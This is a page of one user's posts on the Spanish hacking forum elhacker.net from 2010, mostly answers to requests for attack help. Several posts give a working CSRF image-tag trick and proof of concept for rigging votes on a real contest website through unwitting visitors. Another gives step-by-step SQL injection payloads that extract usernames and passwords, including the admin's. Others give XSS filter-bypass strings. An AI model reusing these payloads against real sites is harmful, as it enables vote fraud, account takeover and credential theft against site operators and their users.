elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7
11  Seguridad Informática / Nivel Web / Re: Hack my site en: 19 Agosto 2010, 22:40 pm
@averno, valiente sin verguenza... xD Tienes suerte de que no vuelva a entrar, sino nos veriamos las caras! ;)
12  Seguridad Informática / Nivel Web / Re: [CSRF]Con htaccess?? en: 19 Agosto 2010, 13:22 pm
No es ninguna vulnerabilidad, es simeplemente una característica usada con genio. Puede servir para bypassear un filtro de extensiones o para hacer creer a alguien que se trata de contenido estático cuando en realidad es dinámico.

@tragantras, tu ReDos no tiene nada de ReDos... Simplemente es una manera de floodear via "heavy-queries". Tal vez podrías causar una denegación de servicio, pero en ningún momento estas haciendo un redos.
13  Seguridad Informática / Seguridad / Re: Ayuda - Burlar pagina de conteo en: 19 Agosto 2010, 00:28 am
@Shell Root, por visitar esa url no realizas una votación, tan solo visitas la página. Coje el LiveHeaders y comprueba lo que pasa al votar, o mira el javascript.

@Leo, elige el nombre de una maqueta en la que no hayas votado. Yo por ejemplo voy a usar "strangers-in-the-space", en la siguiente url podemos ver el número de votaciones, la puntuación media y nos permite hacer clic en una estrella y votar (no lo hagas todavía):

Código:
http://escucha.universia.net.mx/concurso/escucha-maqueta/strangers-in-the-space

Crea un documento html en tu pc con el siguiente contenido:

Código:
<img src="http://escucha.universia.net.mx/concurso/votacion-maqueta/100/strangers-in-the-space"/>

Carga la página y la imagen tratará de cargarse haciendo la votación. Ahora si vas a la primera página y refrescas, habrá cambiado en número de votaciones, la media y si intentas hacer clic en una estrella y votar te avisará de que ya has votado. Así sabemos que el método funciona.

@Leyer, a mi también me saltó esa alerta y pensé que no funcionaría, pero al probarlo y seguir este procedimiento se ve claro que el voto se realiza... :S
14  Seguridad Informática / Seguridad / Re: Ayuda - Burlar pagina de conteo en: 19 Agosto 2010, 00:10 am
El 100 es la valoración máxima. Lo que pasa es que la "maqueta-siguiente", parece que es algo aleatorio...

Un gusto que te sirva! =D
15  Seguridad Informática / Nivel Web / Re: Ayuda, no logro encontrar el nombre de administrador. en: 18 Agosto 2010, 23:40 pm
Sacas todas las tablas, y buscas la de los usuarios:

Código:
union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()+--+

A esa tabla la llamaremos 'usuarios'. Ahora sacas los campos de la tabla usuarios:

Código:
union+select+1,group_concat(column_name),3,4,5+from+information_schema.column+where+table_name='usuarios'+--+

Entre otros campos, tiene el campo 'login' y 'pwd', por ejemplo:

Código:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+--+

Sacará los usuarios. Si en alguno de los pasos no salen todos, es porque no caben, puedes usar 'limit' y sacarlos uno a uno, o usar este truco.

Si solo quieres el del admin, puedes añadir una cláusula where o ver si hay algún campo en la tabla que represente los privilegios del usuario.

Código:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+login+like+'%admin%'--+

Código:
union+select+1,group_concat(login,0x3a,pwd,0x0a),3,4,5+from+usuarios+where+priv=1+--+

No seas malo...
16  Seguridad Informática / Seguridad / Re: Ayuda - Burlar pagina de conteo en: 18 Agosto 2010, 23:24 pm
Yo lo que haría es usar "el poder de la comunidad". Parece que la url para votar una maqueta es la siguiente:

Código:
http://escucha.universia.net.mx/concurso/votacion-maqueta/[1-100]/[titulo]

No permite votar una misma maqueta más de una vez al día por IP. Pero no controla el referrer ni usa ningún tipo de token, de modo que con hacer una simple petición GET a esa página se realizará la votación.

Si en cualquier página o en este mismo foro, pones la foto con la url de la canción que quieres votar, todas las personas votarán al ver la página. Aunque solo puedan votar una vez, como cada persona tiene una IP distinta (generalmente) la avalanacha de puntos no se hará esperar...

PoC:
[img alt="noproxy"]http://escucha.universia.net.mx/concurso/votacion-maqueta/100/historia[/img]

Saludos! ^^
17  Seguridad Informática / Nivel Web / Re: Hack my site en: 18 Agosto 2010, 22:38 pm
Pufff... Esta hecha un cristo... xD

Solo he ojeado, pero a parte de los tropocientos XSS y CSRF. Hay varias Blind SQLi... Ciertamente no creo que haya ni un solo input vigilado, y además parece que hay algún problema en el control de permisos para poner mensajes en los tablones.

No he explotado los sqli, pero de entrada el usuario corre con más privilegios de los que debería.

Y no documento nada porque me huele a que ese debería ser tu trabajo! ¬¬
18  Seguridad Informática / Nivel Web / Re: Tengo el XSS, pero con solo numeros en: 2 Agosto 2010, 21:00 pm
Código
  1. alert(<>wuups</>);
19  Seguridad Informática / Nivel Web / Re: Bypass de un filtro XSS en: 21 Julio 2010, 14:04 pm
Si lo que hace es simplemente escapar las comillas simples y dobles (con barra invertida), no tiene mayor dificultad:

Código:
" onevent=foo() tr="

Código:
"><script>foo()</script><a tr="

Si eso no funciona, es que hace algo más... Si pegas el cacho de html entero, igual lo veo mejor.
20  Foros Generales / Foro Libre / Re: Algun zaragozano se viene al Hacklab en: 20 Julio 2010, 22:34 pm
Yo hace días que tengo pendiente pasarme por allí, pero estoy en el pueblo y no se cuándo volveré. De todas formas, si en septiembre queréis hacer una quedada los maños del foro me apunto... ^^
Por cierto, los del hacklab zgz buscaban gente para organizar el hackmeeting, así que si alguno esta motivado, ya sabe.

Saludetes!! =D
Páginas: 1 [2] 3 4 5 6 7
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines